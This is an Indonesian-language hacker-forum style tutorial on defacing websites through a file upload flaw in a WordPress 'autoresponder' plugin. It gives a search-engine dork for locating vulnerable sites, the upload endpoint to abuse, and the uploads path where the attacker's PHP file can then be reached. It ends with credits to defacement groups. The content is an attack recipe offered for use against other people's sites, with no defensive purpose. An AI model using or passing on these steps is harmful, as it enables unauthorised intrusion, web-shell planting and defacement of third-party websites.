Cara Deface Metode Exploit Wordpress plugins Autoresponder File Upload

Assalamualaikum Kali ini saya akan share metode -> Cara Deface Metode Exploit Wordpress plugins Autoresponder File Upload 

#Vulnerabillity : File Upload 
#Dork : inurl:/autoresponder/jscolor/ [ Dork Kembangin Broh ] 

*Nb : Tidak Bisa ditambah site: contoh :inurl:/autoresponder/jscolor/ site:au

Exploit & POC : 
http://site-terget/wp-content/plugins/autoresponder/media-upload.php
   
File Access :
http://site-target/wp-content/uploads/svp/headerimage/random.php

Example : 

http://site.com/wp-content/uploads/svp/headerimage/2014051020-00-00b37.php

########################################
#Thanks : Dzikri Dot ID | Nabilah Dot ID | Mr.PhoeniX1337 | 

Mr.Dha | Mr.DellatioNx196 | Java Cyber Army |

Muslim Corporation Cyber |

########################################

Author : Dzikri Dot ID